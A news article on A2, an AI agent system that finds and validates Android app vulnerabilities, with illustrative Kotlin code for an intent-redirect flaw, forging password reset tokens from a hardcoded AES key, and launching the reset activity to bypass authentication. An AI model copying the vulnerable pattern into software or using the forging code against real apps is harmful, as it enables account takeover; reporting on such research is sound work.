AI models get slammed for producing sloppy bug reports and burdening open source maintainers with hallucinated issues, but they also have the potential to transform application security through automation.
Computer scientists affiliated with Nanjing University in China and The University of Sydney in Australia say that they’ve developed an AI vulnerability identification system that emulates the way human bug hunters ferret out flaws.
Ziyue Wang (Nanjing) and Liyi Zhou (Sydney) have expanded upon prior work dubbed A1, an AI agent that can develop exploits for cryptocurrency smart contracts, with A2, an AI agent capable of vulnerability discovery and validation in Android apps.
They describe A2 in a preprint paper titled “Agentic Discovery and Validation of Android App Vulnerabilities.”
The authors claim that the A2 system achieves 78.3 percent coverage on the Ghera benchmark, surpassing static analyzers like APKHunt (30.0 percent). And they say that, when they used A2 on 169 production APKs, they found “104 true-positive zero-day vulnerabilities,” 57 of which were self-validated via automatically generated proof-of-concept (PoC) exploits.
One of these included a medium-severity flaw in an Android app with over 10 million installs.
“We discovered an intent redirect issue,” said Liyi Zhou, a lecturer in computer science at The University of Sydney, in an email to The Register. “This is not a trivial bug, and it shows A2’s ability to uncover real, impactful flaws in the wild.”
An intent redirect, he explained, happens when an Android app sends an intent – a message used to request an action, like opening a screen or passing data – but fails to check carefully where it is going. The flaw lets a malicious app redirect that intent to a component it controls.
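In code, the vulnerable pattern looks roughly like the Kotlin sketch below. This is a hypothetical illustration of the general bug class, not the actual code of the affected app; the class and extra names are invented.

```kotlin
import android.app.Activity
import android.content.Intent
import android.os.Bundle

// Illustrative only: an exported activity forwards an attacker-supplied nested
// intent without checking its destination, so the attacker's intent runs with
// the victim app's identity and can reach components it shouldn't.
class ProxyActivity : Activity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        // The nested intent comes straight from whichever app launched us.
        val forwarded = intent.getParcelableExtra<Intent>("next_intent")
        if (forwarded != null) {
            startActivity(forwarded)  // No check on where the intent is going
        }
        finish()
    }
}
```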
Zhou contends there’s no class of vulnerabilities that A2 cannot handle.
A2’s value as a source of signal rather than noise follows from its ability to validate its findings. As the authors observe, “Existing Android vulnerability detection tools overwhelm teams with thousands of low-signal warnings yet uncover few true positives.”
There are a lot of potential vulnerabilities in code, but few of them can be exploited easily. And the problem of false positives is compounded by error-prone AI coding tools that report inconsequential issues.
“A2’s breakthrough is that it mirrors how human security experts actually work,” said Zhou.
The agentic system consists of several off-the-shelf AI models – OpenAI o3 (o3-2025-04-16), Gemini 2.5 Pro (gemini-2.5-pro), Gemini 2.5 Flash (gemini-2.5-flash), and GPT-OSS (gpt-oss-120b) – deployed in three roles: a planner that designs the attack, a task executor that carries out the attack, and a task validator that generates test oracles – checks that decide whether a step actually succeeded – and verifies the results.
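The paper's orchestration code isn't reproduced here, but the division of labor can be pictured roughly like the following Kotlin sketch, in which every type and name is invented for illustration and none of it is taken from the A2 codebase.

```kotlin
// A rough sketch of the planner/executor/validator loop described above.
data class Task(val description: String)
data class Evidence(val artifacts: Map<String, String>)

// The planner designs attack steps, the executor carries them out, and the
// validator acts as the test oracle deciding whether a step really worked.
interface Planner { fun nextTask(done: List<Evidence>): Task? }
interface Executor { fun run(task: Task): Evidence }
interface Validator { fun verify(task: Task, evidence: Evidence): Boolean }

fun hunt(planner: Planner, executor: Executor, validator: Validator): List<Evidence> {
    val validated = mutableListOf<Evidence>()
    while (true) {
        val task = planner.nextTask(validated) ?: break       // stop when the plan is exhausted
        val evidence = executor.run(task)
        if (validator.verify(task, evidence)) validated += evidence  // keep only validated findings
    }
    return validated
}
```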
The researchers’ earlier A1 system only did planning and execution, said Zhou. Its validation was limited to a fixed oracle that decided whether the attack would make money or not.
“The key novelty in A2 is its validator,” said Zhou.
As an example, he described a setup based on a task from the Ghera dataset: an app with a password reset flow stores its AES key as a plain string in strings.xml and uses that key to create a reset token from the user’s email address. Anyone who knows the key can forge tokens for any email.
A2, Zhou explained, breaks this into three tasks:
Task 1: Extract the hardcoded key
- Planner: set the task to find the key in res/values/strings.xml.
- Executor: read the file and extract the key.
- Validator: (i) Check that the file exists. (ii) Check that the extracted key matches the value in the file.
Both pass, so the key is confirmed.
Task 2: Forge a password reset token
- Input a victim email, e.g., example@example.com.
- Encrypt it with AES-ECB using the key.
- Base64 encode the ciphertext to form the token.
- Validator recomputes the token independently and compares outputs.
They match, so the token is confirmed.
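To make Task 2 concrete, here is a hedged Kotlin sketch of the forging step, assuming the key string pulled out of strings.xml in Task 1 and a PKCS5-padded AES-ECB scheme; the key and email values below are placeholders, not details of the Ghera app.

```kotlin
import java.util.Base64
import javax.crypto.Cipher
import javax.crypto.spec.SecretKeySpec

// Forge a reset token as Base64(AES-ECB(email)), using the hardcoded key.
fun forgeResetToken(hardcodedKey: String, victimEmail: String): String {
    val keySpec = SecretKeySpec(hardcodedKey.toByteArray(Charsets.UTF_8), "AES")
    val cipher = Cipher.getInstance("AES/ECB/PKCS5Padding")  // ECB, as in the vulnerable app
    cipher.init(Cipher.ENCRYPT_MODE, keySpec)
    val ciphertext = cipher.doFinal(victimEmail.toByteArray(Charsets.UTF_8))
    return Base64.getEncoder().encodeToString(ciphertext)
}

fun main() {
    // 16-byte placeholder standing in for the key found in res/values/strings.xml.
    val token = forgeResetToken("0123456789abcdef", "example@example.com")
    println(token)  // The validator recomputes this independently and compares.
}
```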
Task 3: Prove authentication bypass
- Launch NewPasswordActivity with the forged token.
- App decrypts the token and displays the bound email.
- Validator: (i) Confirm the activity is NewPasswordActivity. (ii) Confirm the email appears on screen.
Both checks pass, proving the forged token bypasses authentication.
“In short: Task 1 shows the key exists; Task 2 shows the key mints a valid token; Task 3 shows the token bypasses authentication,” said Zhou. “All three steps are concretely validated.”
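From a hostile app’s side, Task 3 could look roughly like the Kotlin below; the victim package name and the "token" extra are assumptions for illustration, since the real identifiers depend on the app under test.

```kotlin
import android.content.Context
import android.content.Intent

// Illustrative only: fire the forged token at the exported NewPasswordActivity.
fun launchBypass(context: Context, forgedToken: String) {
    val intent = Intent().apply {
        setClassName("com.example.victimapp", "com.example.victimapp.NewPasswordActivity")
        putExtra("token", forgedToken)            // extra name assumed for illustration
        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
    }
    context.startActivity(intent)
    // A2's validator then confirms the foreground activity is NewPasswordActivity
    // and that the victim's email is rendered on screen.
}
```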
Zhou argues that AI is already outpacing traditional tools.
“In Android, our A2 system beats existing static analysis, and in smart contracts, A1 is close to state of the art,” he said. “Tools are still useful, but they are slow and hard to build. AI is fast and accessible — we just call APIs, while the AI companies pour billions into training. We are standing on their shoulders.”
All that AI capex looks like a windfall for those pursuing bug bounties, since the per-query cost of calling these models is tiny compared with typical payouts.
“Detection-only costs range from $0.003-0.029 per APK (o3), $0.0004-0.001 per APK (gpt-oss-120b), to $0.002-0.014 per APK (Gemini variants),” the paper says. “Aggregation increases costs to $0.04-0.33 per APK for gpt-oss-120b, $0.06-0.66 per APK for gemini-2.5-flash, $0.26-0.61 per APK for gemini-2.5-pro, and $0.84-3.35 per APK for o3.”
The full validation pipeline with a mixed set of LLMs costs between $0.59 and $4.23 per vulnerability, with a median of $1.77. When gemini-2.5-pro is used for everything, costs range from $4.81 to $26.85 per vulnerability, with a median of $8.94.
Last year, University of Illinois Urbana-Champaign computer scientists showed that OpenAI’s GPT-4 can generate exploits from security advisories at a cost of about $8.80 per exploit.
To the extent that found flaws can be monetized through bug bounty programs, the arbitrage opportunity looks promising for those who can file accurate reports, given that a medium-severity award might run from several hundred to several thousand dollars.
But Zhou observes that bug bounty programs have limited scope. “A cat-and-mouse game is inevitable,” he said. “A2 can uncover serious flaws today, but bug bounty programs only cover a fraction of them. That gap creates a strong incentive for attackers to exploit these bugs directly. How this plays out depends on how quickly defenders move.
“The field is about to explode. The success of A1 and A2 means researchers and hackers alike will rush in. Expect a surge of activity — both in defensive research and in offensive exploitation.”
Asked what a system like A2 might mean for security research, Adam Boynton, senior security strategy manager at Jamf, told The Register, “AI is moving vulnerability discovery from endless scan alerts to proof-based validation. Security teams get fewer false positives, faster fixes, and focus on real risks.”
A2 source code and artifacts have been limited to those with institutional affiliation and a declared research purpose in an effort to balance open research with responsible disclosure. ®